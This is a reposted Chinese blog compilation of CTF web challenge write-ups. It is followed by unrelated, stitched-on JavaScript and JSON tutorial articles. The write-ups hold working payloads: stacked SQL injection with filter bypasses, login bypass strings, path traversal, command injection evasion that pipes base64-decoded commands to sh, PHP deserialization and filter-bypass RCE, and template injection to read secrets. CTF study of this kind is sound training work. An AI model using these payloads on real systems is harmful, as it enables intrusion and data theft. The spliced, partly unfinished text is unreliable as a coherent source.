["source"=>"source.php","hint"=>"hint.php"];//这里是提供了两个白名单if (! isset($page) || !is_string($page)) {echo "you can't see it";return false;}if (in_array($page, $whitelist)) {return true;}$_page = mb_substr( //返回中文字符串的一部分$page,0,mb_strpos($page . '?', '?') //我们输入flag 但其实它在你的字符串后面加了一个问号，然后返回问号的位置，就是=4//所以想绕过这里，直接?flag，他检测到的问号就是0，然后0，0没有执行 就绕过了);if (in_array($_page, $whitelist)) { //检测是不是在白名单/hint.php?flag 进行绕过 进行目录穿越就可以了return true;}$_page = urldecode($page);$_page = mb_substr($_page,0,mb_strpos($_page . '?', '?'));if (in_array($_page, $whitelist)) {return true;}echo "you can't see it";return false;} }//上面是定义了一个类if (! empty($_REQUEST['file']) //如果变量不存在的话，empty()并不会产生警告。 && is_string($_REQUEST['file']) //必须是字符串&& emmm::checkFile($_REQUEST['file']) //上面的那个类) {include $_REQUEST['file']; //就包含这个文件 参数也就是fileexit;} else {echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";} ?> 所以 最后就是 这样 ?file=hint.php?../../../../../../../../ffffllllaaaagggg 就得到了flag flag{acbbba26-c81b-4603-bcb7-25f78adeab18} [强网杯 2019]随便注 进入题目链接 1.输入：1' 查看注入类型 所以他的sql语句是单引号过滤 2.查看字段 （为2） 1' order by 2 3.显示回显 1' union select 1,2 相当于告诉了我们它的过滤 尝试用堆叠查询试试了 4.查库 1;show database(); 5.查表 1';show tables; 所以是有两个表 1919810931114514 words 6.查列 1';show columns from words; 表名words需要被 这个符号包起来，这个符号是 esc下面一个的按键，这个符号在mysql里 用于 分割其他命令，表示此为（表名、字段名） 1';show columns from 1919810931114514; 看到flag了!!! 那么如何查询到数据呢？ select 函数被过滤了，其实mysql的函数有很多 这里通过 MYSQL的预处理语句，使用 : concat（'s','elect',' from 1919810931114514'） 完成绕过 构造pyload： 1';PREPARE test from concat('s','elect',' from 1919810931114514');EXECUTE test; flag{3b3d8fa2-2348-4d6b-81af-017ca90e6c81} [SUCTF 2019]EasySQL 环境我已经启动了 进入题目链接 老套路 先看看源码里面有什么东西 不出意料的什么都没有 但是提示我们它是POST传参 这是一道SQL注入的题目 不管输入什么数字，字母 都是这的 没有回显 但是输入:0没有回显 不知道为啥 而且输入:1' 也不报错 同样是没有回显 尝试注入时 显示Nonono. 也就是说，没有回显，联合查询基本没戏。 好在页面会进行相应的变化，证明注入漏洞肯定是有的。 而且注入点就是这个POST参数框 看了大佬的WP 才想起来 还有堆叠注入 堆叠注入原理 在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union 或者union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入：1; DELETE FROM products服务器端生成的sql语句为：（因未对输入的参数进行过滤）Select from products where productid=1;DELETE FROM products当执行查询后，第一条显示查询信息，第二条则将整个表进行删除。 1;show databases; 1;show tables; 1;use ctf;show tables; 跑字典时 发现了好多的过滤 哭了 没有办法… 看到上面主要是有两中返回，一种是空白，一种是nonono。 在网上查writeup看到 输入1显示:Array ( [0] => 1 )输入a显示:空白输入所有非0数字都显示:Array ( [0] => 1 )输入所有字母（除过滤的关键词外）都显示空白 可以推测题目应该是用了||符号。 推测出题目应该是select $_post[value] || flag from Flag。 这里 就有一个符号|| 当有一边为数字时 运算结果都为 true 返回1 使用 || 运算符，不在是做或运算 而是作为拼接字符串的作用 在oracle 缺省支持 通过 || 来实现字符串拼接，但在mysql 缺省不支持 需要调整mysql 的sql_mode 模式：pipes_as_concat 来实现oracle 的一些功能。 这个意思是在oracle中 || 是作为字符串拼接，而在mysql中是运算符。 当设置sql_mode为pipes_as_concat的时候，mysql也可以把 || 作为字符串拼接。 修改完后，|| 就会被认为是字符串拼接符 MySQL中sql_mode参数，具体的看这里 解题思路1： payload：,1 查询语句：select ,1||flag from Flag 解题思路2： 堆叠注入，使得sql_mode的值为PIPES_AS_CONCAT payload:1;set sql_mode=PIPES_AS_CONCAT;select 1 解析： 在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接。但在mysql 缺省不支持。需要调整mysql 的sql_mode模式：pipes_as_concat 来实现oracle 的一些功能。 flag出来了 头秃 不是很懂 看了好多的wp… [GYCTF2020]Blacklist 进入题目链接 1.注入：1’ 为'闭合 2.看字段：1' order by 2 确认字段为2 3.查看回显:1’ union select 1,2 发现过滤字符 与上面的随便注很像 ，太像了，增加了过滤规则。 修改表名和set均不可用，所以很直接的想到了handler语句。 4.但依旧可以用堆叠注入获取数据库名称、表名、字段。 1';show databases 获取数据库名称1';show tables 获取表名1';show columns from FlagHere ; 或 1';desc FlagHere; 获取字段名 5.接下来用 handler语句读取内容。 1';handler FlagHere open;handler FlagHere read first 直接得到 flag 成功解题。 flag{d0c147ad-1d03-4698-a71c-4fcda3060f17} 补充handler语句相关。 mysql除可使用select查询表中的数据，也可使用handler语句 这条语句使我们能够一行一行的浏览一个表中的数据，不过handler语句并不 具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中 [GKCTF2020]cve版签到 查看提示 菜鸡的第一步 提示了：cve-2020-7066 赶紧去查了一下 cve-2020-7066PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。攻击者可利用该漏洞造成信息泄露。 描述在低于7.2.29的PHP版本7.2.x，低于7.3.16的7.3.x和低于7.4.4的7.4.x中，将get_headers（）与用户提供的URL一起使用时，如果URL包含零（\ 0）字符，则URL将被静默地截断。这可能会导致某些软件对get_headers（）的目标做出错误的假设，并可能将某些信息发送到错误的服务器。 利用方法 总的来说也就是get_headers()可以被%00截断 进入题目链接 知识点： cve-2020-7066利用 老套路：先F12查看源码 发现提示：Flag in localhost 根据以上 直接上了 直接截断 因为提示host必须以123结尾，这个简单 所以需要将localhost替换为127.0.0.123 成功得到flag flag{bf1243d2-08dd-44ee-afe8-45f58e2d6801} GXYCTF2019禁止套娃 考点： .git源码泄露 无参RCE localeconv() 函数返回一包含本地数字及货币格式信息的数组。scandir() 列出 images 目录中的文件和目录。readfile() 输出一个文件。current() 返回数组中的当前单元, 默认取第一个值。pos() current() 的别名。next() 函数将内部指针指向数组中的下一个元素，并输出。array_reverse()以相反的元素顺序返回数组。highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。 具体细节，看这里 进入题目链接 上御剑扫目录 发现是.git源码泄露 上githack补全源码 得到源码 <?phpinclude "flag.php";echo "flag在哪里呢？<br>";if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦！");} }else{die("再好好想想！");} }else{die("还想读flag，臭弟弟！");} }// highlight_file(__FILE__);?> 既然getshell基本不可能，那么考虑读源码 看源码，flag应该就在flag.php 我们想办法读取 首先需要得到当前目录下的文件 scandir()函数可以扫描当前目录下的文件，例如： <?phpprint_r(scandir('.'));?> 那么问题就是如何构造scandir('.') 这里再看函数： localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是. current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 这里还有一个知识点： current(localeconv())永远都是个点 那么就很简单了 print_r(scandir(current(localeconv())));print_r(scandir(pos(localeconv()))); 第二步：读取flag所在的数组 之后我们利用array_reverse() 将数组内容反转一下，利用next()指向flag.php文件==>highlight_file()高亮输出 payload: ?exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); [De1CTF 2019]SSRF Me 首先得到提示 还有源码 进入题目链接 得到一串py 经过整理后 ! /usr/bin/env pythonencoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert_key = os.urandom(16)class Task:def __init__(self, action, param, sign, ip):python得构造方法self.action = actionself.param = paramself.sign = signself.sandbox = md5(ip)if(not os.path.exists(self.sandbox)): SandBox For Remote_Addros.mkdir(self.sandbox)def Exec(self):定义的命令执行函数，此处调用了scan这个自定义的函数result = {}result['code'] = 500if (self.checkSign()):if "scan" in self.action:action要写scantmpfile = open("./%s/result.txt" % self.sandbox, 'w')resp = scan(self.param) 此处是文件读取得注入点if (resp == "Connection Timeout"):result['data'] = respelse:print resp 输出结果tmpfile.write(resp)tmpfile.close()result['code'] = 200if "read" in self.action:action要加readf = open("./%s/result.txt" % self.sandbox, 'r')result['code'] = 200result['data'] = f.read()if result['code'] == 500:result['data'] = "Action Error"else:result['code'] = 500result['msg'] = "Sign Error"return resultdef checkSign(self):if (getSign(self.action, self.param) == self.sign): !!!校验return Trueelse:return Falsegenerate Sign For Action Scan.@app.route("/geneSign", methods=['GET', 'POST']) !!!这个路由用于测试def geneSign():param = urllib.unquote(request.args.get("param", "")) action = "scan"return getSign(action, param)@app.route('/De1ta',methods=['GET','POST'])这个路由是我萌得最终注入点def challenge():action = urllib.unquote(request.cookies.get("action"))param = urllib.unquote(request.args.get("param", ""))sign = urllib.unquote(request.cookies.get("sign"))ip = request.remote_addrif(waf(param)):return "No Hacker!!!!"task = Task(action, param, sign, ip)return json.dumps(task.Exec())@app.route('/')根目录路由，就是显示源代码得地方def index():return open("code.txt","r").read()def scan(param):这是用来扫目录得函数socket.setdefaulttimeout(1)try:return urllib.urlopen(param).read()[:50]except:return "Connection Timeout"def getSign(action, param):!!!这个应该是本题关键点,此处注意顺序先是param后是actionreturn hashlib.md5(secert_key + param + action).hexdigest()def md5(content):return hashlib.md5(content).hexdigest()def waf(param):这个waf比较没用好像check=param.strip().lower()if check.startswith("gopher") or check.startswith("file"):return Trueelse:return Falseif __name__ == '__main__':app.debug = Falseapp.run(host='0.0.0.0') 相关函数 作用 init(self, action, param, …) 构造方法self代表对象,其他是对象的属性 request.args.get(param) 提取get方法传入的，参数名叫param对应得值 request.cookies.get(“action”) 提取cookie信息中的，名为action得对应值 hashlib.md5().hexdigest() hashlib.md5()获取一个md5加密算法对象，hexdigest()是获得加密后的16进制字符串 urllib.unquote(） 将url编码解码 urllib.urlopen() 读取网络文件参数可以是url json.dumps Python 对象编码成 JSON 字符串 这个题先放一下… [极客大挑战 2019]EasySQL 进入题目链接 直接上万能密码 用户随意 admin1' or 1; 得到flag flag{7fc65eb6-985b-494a-8225-de3101a78e89} [极客大挑战 2019]Havefun 进入题目链接 老套路 去F12看看有什么东西 很好 逮住了 获取FLAG的条件是cat=dog，且是get传参 flag就出来了 flag{779b8bac-2d64-4540-b830-1972d70a2db9} [极客大挑战 2019]Secret File 进入题目链接 老套路 先F12查看 发现超链接 直接逮住 既然已经查阅结束了 中间就肯定有一些我们不知道的东西 过去了 上burp看看情况 我们让他挺住 逮住了：secr3t.php 访问一下 简单的绕过 就可以了 成功得到一串字符 进行base解密即可 成功逮住flag flag{ed90509e-d2d1-4161-ae99-74cd27d90ed7} [ACTF2020 新生赛]Include 根据题目信息 是文件包含无疑了 直接点击进来 用php伪协议 绕过就可以了 得到一串编码 base64解密即可 得到flag flag{c09e6921-0c0e-487e-87c9-0937708a78d7} 2018]easy_tornado 都点击一遍 康康 直接filename变量改为：fllllllllllllag 报错了 有提示 render() 是一个渲染函数 具体看这里 就用到SSTI模板注入了 具体看这里 尝试模板注入： /error?msg={ {1} } 发现存在模板注入 md5(cookie_secret+md5(filename)) 分析题目： 1.tornado是一个python的模板，可能会产生SSTI注入漏洞2.flag在/fllllllllllllag中3.render是python中的一个渲染函数，也就是一种模板，通过调用的参数不同，生成不同的网页4.可以推断出filehash的值为md5(cookie_secret+md5(filename)) 根据目前信息，想要得到flag就需要获取cookie_secret 因为tornado存在模版注入漏洞，尝试通过此漏洞获取到所需内容 根据测试页面修改msg得值发现返回值 可以通过msg的值进行修改,而在 taornado框架中存在cookie_secreat 可以通过/error?msg={ {handler.settings} }拿到secreat_cookie 综合以上结果 拿脚本跑一下 得到filehash: ed75a45308da42d3fe98a8f15a2ad36a 一直跑不出来 不知道为啥子 [极客大挑战 2019]LoveSQL 万能密码尝试 直接上万能密码 用户随意 admin1' or 1; 开始正常注入： 查字段：1' order by 3 经过测试 字段为3 查看回显:1’ union select 1,2,3 查数据库 1' union select 1,2,group_concat(schema_name) from information_schema.schemata 查表： [GXYCTF2019]Ping Ping Ping 考察：RCE的防护绕过 直接构造：?ip=127.0.0.1;ls 简单的fuzz一下 就发现=和$没有过滤 所以想到的思路就是使用$IFS$9代替空格，使用拼接变量来拼接出Flag字符串： 构造playload ?ip=127.0.0.1;a=fl;b=ag;cat$IFS$9$a$b 看看他到底过滤了什么：?ip=127.0.0.1;cat$IFS$1index.php 一目了然过滤了啥，flag字眼也过滤了，bash也没了，不过sh没过滤： 继续构造payload： ?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 查看源码，得到flag flag{1fe312b4-96a0-492d-9b97-040c7e333c1a} [RoarCTF 2019]Easy Calc 进入题目链接 查看源码 发现calc.php 利用PHP的字符串解析特性Bypass，具体看这里 HP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事： 1.删除空白符2.将某些字符转换为下划线（包括空格） scandir()：列出参数目录中的文件和目录 发现/被过滤了 ，可以用chr('47')代替 calc.php? num=1;var_dump(scandir(chr(47))) 这里直接上playload calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) flag{76243df6-aecb-4dc5-879e-3964ec7485ee} [极客大挑战 2019]Knife 进入题目链接 根据题目Knife 还有这个一句话木马 猜想尝试用蚁剑连接 测试连接成功 确实是白给了flag [ACTF2020 新生赛]Exec 直接ping 发现有回显 构造playload： 127.0.0.1;cat /flag 成功拿下flag flag{7e582f16-2676-42fa-8b9d-f9d7584096a6} [极客大挑战 2019]PHP 进入题目链接 它提到了备份文件 就肯定是扫目录 把源文件的代码 搞出来 上dirsearch 下载看这里 很简单的使用方法 用来扫目录 -u 指定url -e 指定网站语言 -w 可以加上自己的字典，要带路径 -r 递归跑(查到一个目录后，重复跑) 打开index.php文件 分析这段内容 1.加载了一个class.php文件 2.采用get方式传递一个select参数 3.随后将之反序列化 打开class.php <?phpinclude 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();} }}?> 根据代码的意思可以知道，如果password=100，username=admin 在执行_destruct()的时候可以获得flag 构造序列化 <?phpclass Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;} }$a = new Name('admin', 100);var_dump(serialize($a));?> 得到了序列化 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 但是 还有要求 1.跳过__wakeup()函数 在反序列化字符串时，属性个数的值大于实际属性个数时，就可以 2.private修饰符的问题 private 声明的字段为私有字段，只在所声明的类中可见，在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时，类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度 构造最终的playload ?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;} [极客大挑战 2019]Http 进入题目链接 查看 源码 发现了 超链接的标签 说我们不是从https://www.Sycsecret.com访问的 进入http://node3.buuoj.cn:27883/Secret.php 抓包修改一下Referer 执行一下 随后提示我们浏览器需要使用Syclover， 修改一下User-Agent的内容 就拿到flag了 [HCTF 2018]admin 进入题目链接 这道题有三种解法 1.flask session 伪造 2.unicode欺骗 3.条件竞争 发现 登录和注册功能 随意注册一个账号啦 登录进来之后 登录 之后 查看源码 发现提示 猜测 我们登录 admin账号 即可看见flag 在change password页面发现 访问后 取得源码 第一种方法： flask session 伪造 具体，看这里 flask中session是存储在客户端cookie中的，也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是，签名的作用是防篡改，而无法防止被读取。而flask并没有提供加密操作，所以其session的全部内容都是可以在客户端读取的，这就可能造成一些安全问题。 [极客大挑战 2019]BabySQL 进入题目链接 对用户名进行测试 发现有一些关键字被过滤掉了 猜测后端使用replace()函数过滤 11' oorr 1=1 直接尝试双写 万能密码尝试 双写 可以绕过 查看回显： 1' uniunionon selselectect 1,2,3 over！正常 开始注入 爆库 爆列 爆表 爆内容 本篇文章为转载内容。原文链接：https://blog.csdn.net/wo41ge/article/details/109162753。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...不可或缺的一部分，而JavaScript原生提供的split()方法无疑是其中的关键工具。然而，在大型项目或更复杂的场景下，开发者可能需要更高级的字符串解析功能，例如处理嵌套分隔符、正则表达式匹配等。为此，可以关注近期发布的JavaScript库如lodash和ramda，它们提供了丰富的字符串操作函数，增强了对复杂字符串处理的能力。 举例来说，lodash库中的_.split()函数不仅支持基础的字符串分割，还能结合lodash的其他函数实现深度字符串处理逻辑。另外，对于CSV、JSON等特殊格式的字符串转换，可以借助于专门的数据处理库如papaparse（CSV）和json5（JSON），这些库能帮助开发者高效准确地将字符串内容转化为可进一步操作的数据结构。 同时，随着ES6及后续版本的发布，JavaScript语言本身也在不断强化对字符串操作的支持，诸如模板字面量、扩展运算符以及新增的String.prototype.matchAll()等方法，都为字符串处理提供了更为强大的内建能力。 因此，前端开发者在面对字符串分割问题时，除了掌握基础的split()方法之外，还应持续关注和学习现代JavaScript特性和相关工具库的发展，以便在实际项目中更加灵活高效地进行字符串处理。通过深入了解并合理运用这些资源，能够有效提升代码质量与开发效率，更好地应对各种前端开发挑战。

一、引言 JSON，全称JavaScript Object Notation，是一种轻量级的数据交换格式，易于人阅读和编写，同时也易于机器解析和生成。在许多Web应用程序中，JSON被广泛用于数据交换。这篇文章将深入浅出地探讨如何查找JSON数组中的元素。 二、JSON数组的基本概念 首先，我们需要了解JSON数组的基本概念。JSON数组呀，你可别小瞧它，它其实就是一个有规矩的队列。在这个队列里，成员们可是五花八门，什么样的类型都有可能冒出来。比如常见的字符串、数字啦，还有那个爱走极端的布尔值（true/false），连“无中生有”的null也在其中凑热闹。更有意思的是，这个列表里的元素还可以嵌套其他的JSON数组或者JSON对象，是不是很神奇呢？下面是一个简单的JSON数组的例子： css var arr = [1, "hello", true, null]; 在这个例子中，arr是一个包含四个元素的JSON数组，分别是一个数字、一个字符串、一个布尔值和一个null值。 三、JSON数组的查找方法 有了基本的概念之后，我们就可以开始讨论如何查找JSON数组中的元素了。下面介绍几种常见的查找方法： 1. 使用for循环遍历数组 这是一种最基本的查找方法，通过for循环遍历数组，逐个比较元素，直到找到目标元素为止。 javascript function findElement(arr, target) { for (var i = 0; i < arr.length; i++) { if (arr[i] === target) { return i; } } return -1; } console.log(findElement([1, "hello", true, null], "hello")); // 输出：1 在这个例子中，findElement函数接受一个JSON数组和一个目标元素作为参数，返回目标元素在数组中的索引。如果找不到目标元素，则返回-1。 2. 使用Array.prototype.find()方法 ES6引入了一个新的全局方法——Array.prototype.find()，它可以用来查找满足指定条件的数组元素，并返回第一个匹配的元素。 javascript var arr = [1, "hello", true, null]; console.log(arr.find(function(item) { return item === "hello"; })); // 输出："hello" 在这个例子中，arr.find()方法接受一个回调函数作为参数，该函数会被应用到数组的每个元素上，如果某个元素使回调函数返回true，则该元素会被返回。 3. 使用Array.prototype.includes()方法 ES6还引入了一个全局方法——Array.prototype.includes()，它可以用来判断数组是否包含指定的元素。 javascript var arr = [1, "hello", true, null]; console.log(arr.includes("hello")); // 输出：true 在这个例子中，arr.includes()方法接受一个参数作为参数，如果数组包含该参数，则返回true，否则返回false。 四、总结 JSON数组的查找方法有很多，具体使用哪种方法取决于实际情况。一般来说，如果只需要查找数组中的一个元素，那么使用for循环或者Array.prototype.find()方法都是不错的选择。如果需要判断数组是否包含某个元素，那么可以使用Array.prototype.includes()方法。希望这篇文章能对你有所帮助！

JSON , JavaScript Object Notation，是一种轻量级的数据交换格式。它基于文本，易于阅读和编写，同时也易于机器解析和生成。在文中，JSON被广泛应用于前后端开发中，作为数据交换的标准格式，其简洁的键值对结构使得开发者能够方便地将数据序列化为JSON字符串在网络间传输或存储，并反序列化还原为原生对象进行处理。 JSONPath , 类似于XPath在XML文档中的作用，JSONPath是一种查询和筛选JSON数据的语言，可以用来定位JSON文档中的特定节点或者满足一定条件的子集。在本文给出的例子中，通过使用JSONPath表达式 $.. ?(@.age >= 30) ，我们能快速准确地找到所有年龄大于等于30岁的用户对象，从而展现出相对于传统遍历方法更高的查询效率。 filter() 方法 , filter() 是JavaScript数组的一个内置方法，用于创建一个新的数组，其中包含通过所提供函数实现的测试的所有元素。在文章提到的具体场景中，filter() 方法接收一个回调函数作为参数，该函数会应用到数组的每个元素上，只有当回调函数返回true时，该元素才会被包含在新创建的数组中。所以，在查询JSON数据中年龄大于等于30岁的用户时，filter() 方法直接根据给定的条件过滤出符合条件的用户对象，相比for循环遍历的方式，代码更简洁且执行速度更快。